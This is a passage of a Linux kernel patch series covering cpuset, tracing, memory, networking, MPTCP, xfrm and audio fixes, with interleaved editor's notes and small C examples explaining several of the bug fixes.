++++ b/include/uapi/drm/virtgpu_drm.h
+@@ -64,6 +64,7 @@ struct drm_virtgpu_map {
+ 	__u32 pad;
+ };
+ 
++/* fence_fd is modified on success if VIRTGPU_EXECBUF_FENCE_FD_OUT flag is set. */
+ struct drm_virtgpu_execbuffer {
+ 	__u32 flags;
+ 	__u32 size;
+diff --git a/include/uapi/linux/ip.h b/include/uapi/linux/ip.h
+index 874a92349bf5b..283dec7e36451 100644
+--- a/include/uapi/linux/ip.h
++++ b/include/uapi/linux/ip.h
+@@ -18,6 +18,7 @@
+ #ifndef _UAPI_LINUX_IP_H
+ #define _UAPI_LINUX_IP_H
+ #include <linux/types.h>
++#include <linux/stddef.h>
+ #include <asm/byteorder.h>
+ 
+ #define IPTOS_TOS_MASK		0x1E
+diff --git a/include/uapi/linux/ipv6.h b/include/uapi/linux/ipv6.h
+index 81f4243bebb1c..53326dfc59ecb 100644
+--- a/include/uapi/linux/ipv6.h
++++ b/include/uapi/linux/ipv6.h
+@@ -4,6 +4,7 @@
+ 
+ #include <linux/libc-compat.h>
+ #include <linux/types.h>
++#include <linux/stddef.h>
+ #include <linux/in6.h>
+ #include <asm/byteorder.h>
+ 
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index a753adcbc7c70..fac4260366208 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -1201,12 +1201,13 @@ void rebuild_sched_domains(void)
+ /**
+  * update_tasks_cpumask - Update the cpumasks of tasks in the cpuset.
+  * @cs: the cpuset in which each task's cpus_allowed mask needs to be changed
++ * @new_cpus: the temp variable for the new effective_cpus mask
+  *
+  * Iterate through each task of @cs updating its cpus_allowed to the
+  * effective cpuset's.  As this function is called with cpuset_rwsem held,
+  * cpuset membership stays stable.
+  */
+-static void update_tasks_cpumask(struct cpuset *cs)
++static void update_tasks_cpumask(struct cpuset *cs, struct cpumask *new_cpus)
+ {
+ 	struct css_task_iter it;
+ 	struct task_struct *task;
+@@ -1220,7 +1221,10 @@ static void update_tasks_cpumask(struct cpuset *cs)
+ 		if (top_cs && (task->flags & PF_KTHREAD) &&
+ 		    kthread_is_per_cpu(task))
+ 			continue;
+-		set_cpus_allowed_ptr(task, cs->effective_cpus);
++
++		cpumask_and(new_cpus, cs->effective_cpus,
++			    task_cpu_possible_mask(task));
++		set_cpus_allowed_ptr(task, new_cpus);
+ 	}
+ 	css_task_iter_end(&it);
+ }
+@@ -1505,7 +1509,7 @@ static int update_parent_subparts_cpumask(struct cpuset *cs, int cmd,
+ 	spin_unlock_irq(&callback_lock);
+ 
+ 	if (adding || deleting)
+-		update_tasks_cpumask(parent);
++		update_tasks_cpumask(parent, tmp->new_cpus);
+ 
+ 	/*
+ 	 * Set or clear CS_SCHED_LOAD_BALANCE when partcmd_update, if necessary.
+@@ -1657,7 +1661,7 @@ update_parent_subparts:
+ 		WARN_ON(!is_in_v2_mode() &&
+ 			!cpumask_equal(cp->cpus_allowed, cp->effective_cpus));
+ 
+-		update_tasks_cpumask(cp);
++		update_tasks_cpumask(cp, tmp->new_cpus);
+ 
+ 		/*
+ 		 * On legacy hierarchy, if the effective cpumask of any non-
+@@ -2305,7 +2309,7 @@ static int update_prstate(struct cpuset *cs, int new_prs)
+ 		}
+ 	}
+ 
+-	update_tasks_cpumask(parent);
++	update_tasks_cpumask(parent, tmpmask.new_cpus);
+ 
+ 	if (parent->child_ecpus_count)
+ 		update_sibling_cpumasks(parent, cs, &tmpmask);
+@@ -3318,7 +3322,7 @@ hotplug_update_tasks_legacy(struct cpuset *cs,
+ 	 * as the tasks will be migrated to an ancestor.
+ 	 */
+ 	if (cpus_updated && !cpumask_empty(cs->cpus_allowed))
+-		update_tasks_cpumask(cs);
++		update_tasks_cpumask(cs, new_cpus);
+ 	if (mems_updated && !nodes_empty(cs->mems_allowed))
+ 		update_tasks_nodemask(cs);
+ 
+@@ -3355,7 +3359,7 @@ hotplug_update_tasks(struct cpuset *cs,
+ 	spin_unlock_irq(&callback_lock);
+ 
+ 	if (cpus_updated)
+-		update_tasks_cpumask(cs);
++		update_tasks_cpumask(cs, new_cpus);
+ 	if (mems_updated)
+ 		update_tasks_nodemask(cs);
+ }
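The cpuset change above keeps a task from being handed CPUs it can never run on (for example a 32-bit task on an asymmetric arm64 system): the cpuset's effective mask is first intersected with task_cpu_possible_mask(). With plain bitmasks standing in for struct cpumask, the intersection is just:

#include <stdio.h>

int main(void)
{
	unsigned long effective = 0xF0;	/* cpuset allows CPUs 4-7   */
	unsigned long possible  = 0x3F;	/* task can only run on 0-5 */
	unsigned long allowed   = effective & possible;

	/* Only CPUs 4 and 5 survive; previously the task could be
	 * handed CPUs 6-7 that it is architecturally unable to use. */
	printf("allowed mask: 0x%02lx\n", allowed);
	return 0;
}
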
+diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
+index 010cf4e6d0b8f..728f434de2bbf 100644
+--- a/kernel/locking/rtmutex.c
++++ b/kernel/locking/rtmutex.c
+@@ -901,8 +901,9 @@ static int __sched rt_mutex_adjust_prio_chain(struct task_struct *task,
+ 		 * then we need to wake the new top waiter up to try
+ 		 * to get the lock.
+ 		 */
+-		if (prerequeue_top_waiter != rt_mutex_top_waiter(lock))
+-			wake_up_state(waiter->task, waiter->wake_state);
++		top_waiter = rt_mutex_top_waiter(lock);
++		if (prerequeue_top_waiter != top_waiter)
++			wake_up_state(top_waiter->task, top_waiter->wake_state);
+ 		raw_spin_unlock_irq(&lock->wait_lock);
+ 		return 0;
+ 	}
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 546e84ae9993b..a387bdc6af013 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -9144,9 +9144,6 @@ buffer_percent_write(struct file *filp, const char __user *ubuf,
+ 	if (val > 100)
+ 		return -EINVAL;
+ 
+-	if (!val)
+-		val = 1;
+-
+ 	tr->buffer_percent = val;
+ 
+ 	(*ppos)++;
+diff --git a/kernel/trace/trace.h b/kernel/trace/trace.h
+index 9e931f51328a2..ac7af03ce8372 100644
+--- a/kernel/trace/trace.h
++++ b/kernel/trace/trace.h
+@@ -1282,6 +1282,7 @@ struct ftrace_event_field {
+ 	int			offset;
+ 	int			size;
+ 	int			is_signed;
++	int			len;
+ };
+ 
+ struct prog_entry;
+diff --git a/kernel/trace/trace_events.c b/kernel/trace/trace_events.c
+index f71ea6e79b3c8..2a2ea9b6f7625 100644
+--- a/kernel/trace/trace_events.c
++++ b/kernel/trace/trace_events.c
+@@ -114,7 +114,7 @@ trace_find_event_field(struct trace_event_call *call, char *name)
+ 
+ static int __trace_define_field(struct list_head *head, const char *type,
+ 				const char *name, int offset, int size,
+-				int is_signed, int filter_type)
++				int is_signed, int filter_type, int len)
+ {
+ 	struct ftrace_event_field *field;
+ 
+@@ -133,6 +133,7 @@ static int __trace_define_field(struct list_head *head, const char *type,
+ 	field->offset = offset;
+ 	field->size = size;
+ 	field->is_signed = is_signed;
++	field->len = len;
+ 
+ 	list_add(&field->link, head);
+ 
+@@ -150,14 +151,28 @@ int trace_define_field(struct trace_event_call *call, const char *type,
+ 
+ 	head = trace_get_fields(call);
+ 	return __trace_define_field(head, type, name, offset, size,
+-				    is_signed, filter_type);
++				    is_signed, filter_type, 0);
+ }
+ EXPORT_SYMBOL_GPL(trace_define_field);
+ 
++int trace_define_field_ext(struct trace_event_call *call, const char *type,
++		       const char *name, int offset, int size, int is_signed,
++		       int filter_type, int len)
++{
++	struct list_head *head;
++
++	if (WARN_ON(!call->class))
++		return 0;
++
++	head = trace_get_fields(call);
++	return __trace_define_field(head, type, name, offset, size,
++				    is_signed, filter_type, len);
++}
++
+ #define __generic_field(type, item, filter_type)			\
+ 	ret = __trace_define_field(&ftrace_generic_fields, #type,	\
+ 				   #item, 0, 0, is_signed_type(type),	\
+-				   filter_type);			\
++				   filter_type, 0);			\
+ 	if (ret)							\
+ 		return ret;
+ 
+@@ -166,7 +181,7 @@ EXPORT_SYMBOL_GPL(trace_define_field);
+ 				   "common_" #item,			\
+ 				   offsetof(typeof(ent), item),		\
+ 				   sizeof(ent.item),			\
+-				   is_signed_type(type), FILTER_OTHER);	\
++				   is_signed_type(type), FILTER_OTHER, 0);	\
+ 	if (ret)							\
+ 		return ret;
+ 
+@@ -1588,12 +1603,17 @@ static int f_show(struct seq_file *m, void *v)
+ 		seq_printf(m, "\tfield:%s %s;\toffset:%u;\tsize:%u;\tsigned:%d;\n",
+ 			   field->type, field->name, field->offset,
+ 			   field->size, !!field->is_signed);
+-	else
+-		seq_printf(m, "\tfield:%.*s %s%s;\toffset:%u;\tsize:%u;\tsigned:%d;\n",
++	else if (field->len)
++		seq_printf(m, "\tfield:%.*s %s[%d];\toffset:%u;\tsize:%u;\tsigned:%d;\n",
+ 			   (int)(array_descriptor - field->type),
+ 			   field->type, field->name,
+-			   array_descriptor, field->offset,
++			   field->len, field->offset,
+ 			   field->size, !!field->is_signed);
++	else
++		seq_printf(m, "\tfield:%.*s %s[];\toffset:%u;\tsize:%u;\tsigned:%d;\n",
++				(int)(array_descriptor - field->type),
++				field->type, field->name,
++				field->offset, field->size, !!field->is_signed);
+ 
+ 	return 0;
+ }
+@@ -2379,9 +2399,10 @@ event_define_fields(struct trace_event_call *call)
+ 			}
+ 
+ 			offset = ALIGN(offset, field->align);
+-			ret = trace_define_field(call, field->type, field->name,
++			ret = trace_define_field_ext(call, field->type, field->name,
+ 						 offset, field->size,
+-						 field->is_signed, field->filter_type);
++						 field->is_signed, field->filter_type,
++						 field->len);
+ 			if (WARN_ON_ONCE(ret)) {
+ 				pr_err("error code is %d\n", ret);
+ 				break;
+diff --git a/kernel/trace/trace_export.c b/kernel/trace/trace_export.c
+index d960f6b11b5e5..58f3946081e21 100644
+--- a/kernel/trace/trace_export.c
++++ b/kernel/trace/trace_export.c
+@@ -111,7 +111,8 @@ static void __always_unused ____ftrace_check_##name(void)		\
+ #define __array(_type, _item, _len) {					\
+ 	.type = #_type"["__stringify(_len)"]", .name = #_item,		\
+ 	.size = sizeof(_type[_len]), .align = __alignof__(_type),	\
+-	is_signed_type(_type), .filter_type = FILTER_OTHER },
++	is_signed_type(_type), .filter_type = FILTER_OTHER,			\
++	.len = _len },
+ 
+ #undef __array_desc
+ #define __array_desc(_type, _container, _item, _len) __array(_type, _item, _len)
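
[Editor's note] The effect of the len plumbing above shows up in each event's format file under tracefs. As a plausible illustration, not output captured from a real kernel: a field declared with __array(char, comm, 16) previously had its declared element count lost, whereas with field->len recorded f_show() can print

	field:char comm[16];	offset:8;	size:16;	signed:0;

while a field whose length is genuinely unknown (len == 0) falls back to the empty-bracket form

	field:char comm[];	offset:8;	size:16;	signed:0;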
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index 6e60657875d32..b2877a84ed19c 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -5640,9 +5640,12 @@ EXPORT_SYMBOL(get_zeroed_page);
+  */
+ void __free_pages(struct page *page, unsigned int order)
+ {
++	/* get PageHead before we drop reference */
++	int head = PageHead(page);
++
+ 	if (put_page_testzero(page))
+ 		free_the_page(page, order);
+-	else if (!PageHead(page))
++	else if (!head)
+ 		while (order-- > 0)
+ 			free_the_page(page + (1 << order), order);
+ }
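
[Editor's sketch] The mm/page_alloc.c fix above is a classic capture-before-release pattern: PageHead() must be read while the caller still holds a reference, because once put_page_testzero() can succeed on another CPU the page may be freed and reused, making a later flag read a use-after-free. A self-contained analogue of the discipline, with a toy refcount rather than the kernel's struct page:

#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>

struct obj {
	int refcount;
	bool is_head;		/* stand-in for PageHead() */
};

/* Returns true when the caller dropped the last reference. */
static bool put_testzero(struct obj *o)
{
	return --o->refcount == 0;
}

static void put_obj(struct obj *o)
{
	/* Capture the flag while we still hold a reference ... */
	bool head = o->is_head;

	if (put_testzero(o))
		free(o);	/* another holder could get here first ... */
	else if (!head)		/* ... so never read o->is_head after the put */
		printf("not a head page: freeing tail pages\n");
}

int main(void)
{
	struct obj *o = calloc(1, sizeof(*o));

	if (!o)
		return 1;
	o->refcount = 2;	/* a second holder keeps the object alive */
	put_obj(o);		/* takes the "else" branch safely */
	free(o);
	return 0;
}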
+diff --git a/net/can/j1939/address-claim.c b/net/can/j1939/address-claim.c
+index f33c473279278..ca4ad6cdd5cbf 100644
+--- a/net/can/j1939/address-claim.c
++++ b/net/can/j1939/address-claim.c
+@@ -165,6 +165,46 @@ static void j1939_ac_process(struct j1939_priv *priv, struct sk_buff *skb)
+ 	 * leaving this function.
+ 	 */
+ 	ecu = j1939_ecu_get_by_name_locked(priv, name);
++
++	if (ecu && ecu->addr == skcb->addr.sa) {
++		/* The ISO 11783-5 standard, in "4.5.2 - Address claim
++		 * requirements", states:
++		 *   d) No CF shall begin, or resume, transmission on the
++		 *      network until 250 ms after it has successfully claimed
++		 *      an address except when responding to a request for
++		 *      address-claimed.
++		 *
++		 * But "Figure 6" and "Figure 7" in "4.5.4.2 - Address-claim
++		 * prioritization" show that the CF begins the transmission
++		 * after 250 ms from the first AC (address-claimed) message
++		 * even if it sends another AC message during that time window
++		 * to resolve the address contention with another CF.
++		 *
++		 * As stated in "4.4.2.3 - Address-claimed message":
++		 *   In order to successfully claim an address, the CF sending
++		 *   an address claimed message shall not receive a contending
++		 *   claim from another CF for at least 250 ms.
++		 *
++		 * As stated in "4.4.3.2 - NAME management (NM) message":
++		 *   1) A commanding CF can
++		 *      d) request that a CF with a specified NAME transmit
++		 *         the address-claimed message with its current NAME.
++		 *   2) A target CF shall
++		 *      d) send an address-claimed message in response to a
++		 *         request for a matching NAME
++		 *
++		 * Taking the above arguments into account, the 250 ms wait is
++		 * requested only during network initialization.
++		 *
++		 * Do not restart the timer on AC message if both the NAME and
++		 * the address match and so if the address has already been
++		 * claimed (timer has expired) or the AC message has been sent
++		 * to resolve the contention with another CF (timer is still
++		 * running).
++		 */
++		goto out_ecu_put;
++	}
++
+ 	if (!ecu && j1939_address_is_unicast(skcb->addr.sa))
+ 		ecu = j1939_ecu_create_locked(priv, name);
+ 
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 30407b2dd2ac4..ba6ea61b3458b 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -1524,6 +1524,8 @@ set_sndbuf:
+ 			ret = -EINVAL;
+ 			break;
+ 		}
++		if ((u8)val == SOCK_TXREHASH_DEFAULT)
++			val = READ_ONCE(sock_net(sk)->core.sysctl_txrehash);
+ 		/* Paired with READ_ONCE() in tcp_rtx_synack() */
+ 		WRITE_ONCE(sk->sk_txrehash, (u8)val);
+ 		break;
+@@ -3428,7 +3430,6 @@ void sock_init_data(struct socket *sock, struct sock *sk)
+ 	sk->sk_pacing_rate = ~0UL;
+ 	WRITE_ONCE(sk->sk_pacing_shift, 10);
+ 	sk->sk_incoming_cpu = -1;
+-	sk->sk_txrehash = SOCK_TXREHASH_DEFAULT;
+ 
+ 	sk_rx_queue_clear(sk);
+ 	/*
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 92d4237862518..5b19b77d5d759 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -347,6 +347,7 @@ lookup_protocol:
+ 	sk->sk_destruct	   = inet_sock_destruct;
+ 	sk->sk_protocol	   = protocol;
+ 	sk->sk_backlog_rcv = sk->sk_prot->backlog_rcv;
++	sk->sk_txrehash = READ_ONCE(net->core.sysctl_txrehash);
+ 
+ 	inet->uc_ttl	= -1;
+ 	inet->mc_loop	= 1;
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 647b3c6b575ef..7152ede18f115 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -1225,9 +1225,6 @@ int inet_csk_listen_start(struct sock *sk)
+ 	sk->sk_ack_backlog = 0;
+ 	inet_csk_delack_init(sk);
+ 
+-	if (sk->sk_txrehash == SOCK_TXREHASH_DEFAULT)
+-		sk->sk_txrehash = READ_ONCE(sock_net(sk)->core.sysctl_txrehash);
+-
+ 	/* There is race window here: we announce ourselves listening,
+ 	 * but this transition is still not validated by get_port().
+ 	 * It is OK, because this socket enters to hash table only
+diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
+index 7b0cd54da452b..fb1bf6eb0ff8e 100644
+--- a/net/ipv6/af_inet6.c
++++ b/net/ipv6/af_inet6.c
+@@ -221,6 +221,7 @@ lookup_protocol:
+ 	np->pmtudisc	= IPV6_PMTUDISC_WANT;
+ 	np->repflow	= net->ipv6.sysctl.flowlabel_reflect & FLOWLABEL_REFLECT_ESTABLISHED;
+ 	sk->sk_ipv6only	= net->ipv6.sysctl.bindv6only;
++	sk->sk_txrehash = READ_ONCE(net->core.sysctl_txrehash);
+ 
+ 	/* Init the ipv4 part of the socket since we can have sockets
+ 	 * using v6 API for ipv4.
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 29849d77e4bf8..938cccab331dd 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2908,6 +2908,7 @@ bool __mptcp_close(struct sock *sk, long timeout)
+ 	struct mptcp_subflow_context *subflow;
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 	bool do_cancel_work = false;
++	int subflows_alive = 0;
+ 
+ 	sk->sk_shutdown = SHUTDOWN_MASK;
+ 
+@@ -2933,6 +2934,8 @@ cleanup:
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+ 		bool slow = lock_sock_fast_nested(ssk);
+ 
++		subflows_alive += ssk->sk_state != TCP_CLOSE;
++
+ 		/* since the close timeout takes precedence on the fail one,
+ 		 * cancel the latter
+ 		 */
+@@ -2948,6 +2951,12 @@ cleanup:
+ 	}
+ 	sock_orphan(sk);
+ 
++	/* all the subflows are closed, only timeout can change the msk
++	 * state, let's not keep resources busy for no reason
++	 */
++	if (subflows_alive == 0)
++		inet_sk_state_store(sk, TCP_CLOSE);
++
+ 	sock_hold(sk);
+ 	pr_debug("msk=%p state=%d", sk, sk->sk_state);
+ 	if (mptcp_sk(sk)->token)
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 5220435d8e34d..929b0ee8b3d5f 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1344,6 +1344,7 @@ void __mptcp_error_report(struct sock *sk)
+ 	mptcp_for_each_subflow(msk, subflow) {
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+ 		int err = sock_error(ssk);
++		int ssk_state;
+ 
+ 		if (!err)
+ 			continue;
+@@ -1354,7 +1355,14 @@ void __mptcp_error_report(struct sock *sk)
+ 		if (sk->sk_state != TCP_SYN_SENT && !__mptcp_check_fallback(msk))
+ 			continue;
+ 
+-		inet_sk_state_store(sk, inet_sk_state_load(ssk));
++		/* We need to propagate only transition to CLOSE state.
++		 * Orphaned socket will see such state change via
++		 * subflow_sched_work_if_closed() and that path will properly
++		 * destroy the msk as needed.
++		 */
++		ssk_state = inet_sk_state_load(ssk);
++		if (ssk_state == TCP_CLOSE && !sock_flag(sk, SOCK_DEAD))
++			inet_sk_state_store(sk, ssk_state);
+ 		sk->sk_err = -err;
+ 
+ 		/* This barrier is coupled with smp_rmb() in mptcp_poll() */
+diff --git a/net/rds/message.c b/net/rds/message.c
+index 44dbc612ef549..9402bc941823f 100644
+--- a/net/rds/message.c
++++ b/net/rds/message.c
+@@ -104,9 +104,9 @@ static void rds_rm_zerocopy_callback(struct rds_sock *rs,
+ 	spin_lock_irqsave(&q->lock, flags);
+ 	head = &q->zcookie_head;
+ 	if (!list_empty(head)) {
+-		info = list_entry(head, struct rds_msg_zcopy_info,
+-				  rs_zcookie_next);
+-		if (info && rds_zcookie_add(info, cookie)) {
++		info = list_first_entry(head, struct rds_msg_zcopy_info,
++					rs_zcookie_next);
++		if (rds_zcookie_add(info, cookie)) {
+ 			spin_unlock_irqrestore(&q->lock, flags);
+ 			kfree(rds_info_from_znotifier(znotif));
+ 			/* caller invokes rds_wake_sk_sleep() */
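
[Editor's sketch] The rds change above is subtler than it looks: list_entry(head, ...) computes container_of() on the list head itself, which is embedded in the queue structure rather than in any element, so treating the result as an entry dereferences garbage; list_first_entry(head, ...) resolves head->next instead, and the old "info &&" check could never catch that. A self-contained demonstration of the difference, using simplified list types rather than the kernel's <linux/list.h>:

#include <stddef.h>
#include <stdio.h>

struct list_head { struct list_head *next, *prev; };

#define container_of(ptr, type, member) \
	((type *)((char *)(ptr) - offsetof(type, member)))
#define list_entry(ptr, type, member)        container_of(ptr, type, member)
#define list_first_entry(head, type, member) list_entry((head)->next, type, member)

struct item { int cookie; struct list_head node; };

int main(void)
{
	struct item a = { .cookie = 42 };
	struct list_head head = { &a.node, &a.node };

	a.node.next = a.node.prev = &head;

	/* Bug pattern: the "entry" of the head is the head's own container
	 * reinterpreted as an item -- its fields are garbage. */
	struct item *wrong = list_entry(&head, struct item, node);
	/* Fix: the first real element hangs off head.next. */
	struct item *right = list_first_entry(&head, struct item, node);

	printf("right->cookie = %d (wrong points at %p, not a real item)\n",
	       right->cookie, (void *)wrong);
	return 0;
}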
+diff --git a/net/xfrm/xfrm_compat.c b/net/xfrm/xfrm_compat.c
+index a0f62fa02e06e..8cbf45a8bcdc2 100644
+--- a/net/xfrm/xfrm_compat.c
++++ b/net/xfrm/xfrm_compat.c
+@@ -5,6 +5,7 @@
+  * Based on code and translator idea by: Florian Westphal <fw@strlen.de>
+  */
+ #include <linux/compat.h>
++#include <linux/nospec.h>
+ #include <linux/xfrm.h>
+ #include <net/xfrm.h>
+ 
+@@ -302,7 +303,7 @@ static int xfrm_xlate64(struct sk_buff *dst, const struct nlmsghdr *nlh_src)
+ 	nla_for_each_attr(nla, attrs, len, remaining) {
+ 		int err;
+ 
+-		switch (type) {
++		switch (nlh_src->nlmsg_type) {
+ 		case XFRM_MSG_NEWSPDINFO:
+ 			err = xfrm_nla_cpy(dst, nla, nla_len(nla));
+ 			break;
+@@ -437,6 +438,7 @@ static int xfrm_xlate32_attr(void *dst, const struct nlattr *nla,
+ 		NL_SET_ERR_MSG(extack, "Bad attribute");
+ 		return -EOPNOTSUPP;
+ 	}
++	type = array_index_nospec(type, XFRMA_MAX + 1);
+ 	if (nla_len(nla) < compat_policy[type].len) {
+ 		NL_SET_ERR_MSG(extack, "Attribute bad length");
+ 		return -EOPNOTSUPP;
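
[Editor's sketch] The array_index_nospec() added above sits between the bounds check on type and the compat_policy[type] lookup: without it, the CPU can speculatively execute the table access with an out-of-range index before the branch resolves (Spectre v1). The helper returns the index unchanged when in range and 0 otherwise, using branch-free arithmetic so there is nothing to mispredict. A compilable sketch in the spirit of the kernel's generic mask, simplified here and assuming index and size both fit in a signed long:

#include <stdio.h>

/* All-ones when idx < size, all-zeroes otherwise; no branches, so the
 * clamp holds even under speculation. Simplified from the generic
 * array_index_mask_nospec(). */
static unsigned long index_mask(unsigned long idx, unsigned long size)
{
	return ~(long)(idx | (size - 1UL - idx)) >> (sizeof(long) * 8 - 1);
}

int main(void)
{
	int table[4] = { 10, 20, 30, 40 };
	unsigned long idx = 7;	/* attacker-influenced, out of range */

	idx &= index_mask(idx, 4);	/* clamped to 0 */
	printf("table[%lu] = %d\n", idx, table[idx]);
	return 0;
}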
+diff --git a/net/xfrm/xfrm_input.c b/net/xfrm/xfrm_input.c
+index 97074f6f2bdee..2defd89da700d 100644
+--- a/net/xfrm/xfrm_input.c
++++ b/net/xfrm/xfrm_input.c
+@@ -279,8 +279,7 @@ static int xfrm6_remove_tunnel_encap(struct xfrm_state *x, struct sk_buff *skb)
+ 		goto out;
+ 
+ 	if (x->props.flags & XFRM_STATE_DECAP_DSCP)
+-		ipv6_copy_dscp(ipv6_get_dsfield(ipv6_hdr(skb)),
+-			       ipipv6_hdr(skb));
++		ipv6_copy_dscp(XFRM_MODE_SKB_CB(skb)->tos, ipipv6_hdr(skb));
+ 	if (!(x->props.flags & XFRM_STATE_NOECN))
+ 		ipip6_ecn_decapsulate(skb);
+ 
+diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
+index e392d8d05e0ca..52538d5360673 100644
+--- a/net/xfrm/xfrm_policy.c
++++ b/net/xfrm/xfrm_policy.c
+@@ -336,7 +336,7 @@ static void xfrm_policy_timer(struct timer_list *t)
+ 	}
+ 	if (xp->lft.hard_use_expires_seconds) {
+ 		time64_t tmo = xp->lft.hard_use_expires_seconds +
+-			(xp->curlft.use_time ? : xp->curlft.add_time) - now;
++			(READ_ONCE(xp->curlft.use_time) ? : xp->curlft.add_time) - now;
+ 		if (tmo <= 0)
+ 			goto expired;
+ 		if (tmo < next)
+@@ -354,7 +354,7 @@ static void xfrm_policy_timer(struct timer_list *t)
+ 	}
+ 	if (xp->lft.soft_use_expires_seconds) {
+ 		time64_t tmo = xp->lft.soft_use_expires_seconds +
+-			(xp->curlft.use_time ? : xp->curlft.add_time) - now;
++			(READ_ONCE(xp->curlft.use_time) ? : xp->curlft.add_time) - now;
+ 		if (tmo <= 0) {
+ 			warn = 1;
+ 			tmo = XFRM_KM_TIMEOUT;
+@@ -3586,7 +3586,8 @@ int __xfrm_policy_check(struct sock *sk, int dir, struct sk_buff *skb,
+ 		return 1;
+ 	}
+ 
+-	pol->curlft.use_time = ktime_get_real_seconds();
++	/* This lockless write can happen from different cpus. */
++	WRITE_ONCE(pol->curlft.use_time, ktime_get_real_seconds());
+ 
+ 	pols[0] = pol;
+ 	npols++;
+@@ -3601,7 +3602,9 @@ int __xfrm_policy_check(struct sock *sk, int dir, struct sk_buff *skb,
+ 				xfrm_pol_put(pols[0]);
+ 				return 0;
+ 			}
+-			pols[1]->curlft.use_time = ktime_get_real_seconds();
++			/* This write can happen from different cpus. */
++			WRITE_ONCE(pols[1]->curlft.use_time,
++				   ktime_get_real_seconds());
+ 			npols++;
+ 		}
+ 	}
+diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c
+index 3d2fe7712ac5b..0f88cb6fc3c22 100644
+--- a/net/xfrm/xfrm_state.c
++++ b/net/xfrm/xfrm_state.c
+@@ -572,7 +572,7 @@ static enum hrtimer_restart xfrm_timer_handler(struct hrtimer *me)
+ 	}
+ 	if (x->lft.hard_use_expires_seconds) {
+ 		long tmo = x->lft.hard_use_expires_seconds +
+-			(x->curlft.use_time ? : now) - now;
++			(READ_ONCE(x->curlft.use_time) ? : now) - now;
+ 		if (tmo <= 0)
+ 			goto expired;
+ 		if (tmo < next)
+@@ -594,7 +594,7 @@ static enum hrtimer_restart xfrm_timer_handler(struct hrtimer *me)
+ 	}
+ 	if (x->lft.soft_use_expires_seconds) {
+ 		long tmo = x->lft.soft_use_expires_seconds +
+-			(x->curlft.use_time ? : now) - now;
++			(READ_ONCE(x->curlft.use_time) ? : now) - now;
+ 		if (tmo <= 0)
+ 			warn = 1;
+ 		else if (tmo < next)
+@@ -1754,7 +1754,7 @@ out:
+ 
+ 		hrtimer_start(&x1->mtimer, ktime_set(1, 0),
+ 			      HRTIMER_MODE_REL_SOFT);
+-		if (x1->curlft.use_time)
++		if (READ_ONCE(x1->curlft.use_time))
+ 			xfrm_state_check_expire(x1);
+ 
+ 		if (x->props.smark.m || x->props.smark.v || x->if_id) {
+@@ -1786,8 +1786,8 @@ EXPORT_SYMBOL(xfrm_state_update);
+ 
+ int xfrm_state_check_expire(struct xfrm_state *x)
+ {
+-	if (!x->curlft.use_time)
+-		x->curlft.use_time = ktime_get_real_seconds();
++	if (!READ_ONCE(x->curlft.use_time))
++		WRITE_ONCE(x->curlft.use_time, ktime_get_real_seconds());
+ 
+ 	if (x->curlft.bytes >= x->lft.hard_byte_limit ||
+ 	    x->curlft.packets >= x->lft.hard_packet_limit) {
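
[Editor's sketch] All of the curlft.use_time sites above gain READ_ONCE()/WRITE_ONCE() because the field is stamped lazily from the packet path on whatever CPU handles the flow and read concurrently from the timer, with no common lock; the annotations force exactly one untorn access per site and stop the compiler from caching or refetching the value. A minimal userspace rendering of the pattern; the macro bodies below mirror the kernel's volatile-cast approach but are local definitions for this sketch, and typeof is a GNU C extension:

#include <pthread.h>
#include <stdio.h>
#include <time.h>

#define READ_ONCE(x)	 (*(const volatile typeof(x) *)&(x))
#define WRITE_ONCE(x, v) (*(volatile typeof(x) *)&(x) = (v))

static long use_time;	/* stamped by the "packet path", read by the "timer" */

static void *packet_path(void *arg)
{
	(void)arg;
	if (!READ_ONCE(use_time))		/* lazily stamp first use */
		WRITE_ONCE(use_time, (long)time(NULL));
	return NULL;
}

int main(void)
{
	pthread_t t;

	pthread_create(&t, NULL, packet_path, NULL);
	pthread_join(t, NULL);
	printf("use_time=%ld\n", READ_ONCE(use_time));
	return 0;
}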
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index db9518de9343c..1134a493d225a 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9423,6 +9423,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x89c3, "Zbook Studio G9", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x89c6, "Zbook Fury 17 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x89ca, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
